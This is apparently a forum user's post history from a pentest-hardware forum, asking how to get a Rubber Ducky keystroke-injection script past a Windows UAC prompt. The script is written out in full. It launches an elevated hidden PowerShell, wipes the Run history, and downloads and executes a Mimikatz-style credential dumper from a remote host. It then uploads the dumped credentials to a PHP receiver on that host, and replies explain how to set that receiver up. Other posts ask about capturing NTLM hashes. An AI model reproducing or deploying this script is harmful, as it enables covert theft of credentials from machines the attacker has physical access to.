mhuggins
-
Posts
11 -
Joined
-
Last visited
Posts posted by mhuggins
-
-
yes i did try manually. What appears to happen that after the first string completes it opens the UAC dialog box but doesnt work after that. I have to physically click the dialog box then press ALT y myself.....almost like the UAC box isnt the active window if that makes sense. I thought maybe it was the delay that was the problem but i set it to 10000 and still woulldnt work. I am using US keyboard
-
below is my code that i piece together from other scripts including the Mr. Robot cred dump..... again i take no credit in this but i need help.
Win 10 machine with UAC enabled
When i run the script it doesnt get pass the UAC yes or no box .... any ideas
I have the ALT y command in there during testing so its not bot the ALT y or LEFTARROW
Thanks in advance
DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 500
REM ALT y
LEFTARROW
DELAY 300
ENTER
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.mysite/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('http://www.mysite/rx.php', $o)"
ENTER
-
Trying to decided between bashbunny or the LAN turtle.... Just want to know of the bunny can do the lock screen bypass that the turtle can do that mubix showcased and Darren talked about
-
Just now, ThoughtfulDev said:
Yep just save it as a .php file.
To me it seems that you need to gain some basic knowledge. Not wanting to be rude or sth ^^
i have it .... just dont want to be wrong. Thanks bud
-
3 minutes ago, ThoughtfulDev said:
it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php.
if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php
one last thing .... what format do i save the rx file. just open notepad paste it then save as ....... php?
-
Just now, ThoughtfulDev said:
it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php.
if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php
thanks ill give it a try
-
7 hours ago, ThoughtfulDev said:
Just upload the rx.php to your desdired webhost via e.g Filezilla.
ok does it matter where in the file sturcture or just the root of the website directory
-
Tw1sT
you said use your domain.com page to host the cred receiving php script......
how or where do you do that
Thanks
[PAYLOAD_UPDATE] QuickCreds
in Payloads
Posted
ok i got this working like a champ but quick question..... i keep getting ntlmv2 hash and not ntlm. Is there a way to get the ntlm hash instead of v2?